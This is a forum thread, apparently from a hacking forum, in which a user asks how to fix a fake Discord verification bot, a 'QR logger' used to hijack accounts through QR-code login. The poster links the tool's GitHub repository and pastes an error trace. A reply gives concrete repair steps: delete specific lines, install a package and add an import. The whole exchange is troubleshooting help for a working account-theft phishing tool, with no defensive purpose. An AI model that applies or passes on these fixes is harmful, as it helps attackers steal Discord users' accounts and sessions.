Discord QR Bot Logger
by - Thursday, January 1, 1970 at 12:00 AM
[align=center][size=x-large]Does anyone know how to fix the on-going issue with discord QR bots?[/size][/align]if you need to code it's here ( https://github.com/0y9/Fake-Verify-Bot-Discord) [hr]Theres something wrong with the code since everything works besides the QR code[img]https://media.discordapp.net/attachments/1046539847659159702/1046605532812816445/IMG.png[/img][hr]The code in console Task exception was never retrievedfuture: .verification_callback..RemoteAuthClient.run() done, defined at main.py:184> exception=AttributeError("'NoneType' object has no attribute 'cancel'")>Traceback (most recent call last): File "main.py", line 229, in run self._heartbeatTask.cancel()AttributeError: 'NoneType' object has no attribute 'cancel'[hr]if you can help please do !discord: drillino#0001
Reply
Solution.
next time. look at the issues page
https://github.com/0y9/Fake-Verify-Bot-Discord/issues/13
Delete all lines from 129 to 227,
Open your terminal/command prompt and run pip install remoteauthclient,
Go back to the main.py file & at the top of the file, add a new 2nd line that says: from remoteauthclient import RemoteAuthClient
Reply


 Users viewing this thread: Discord QR Bot Logger: No users currently viewing.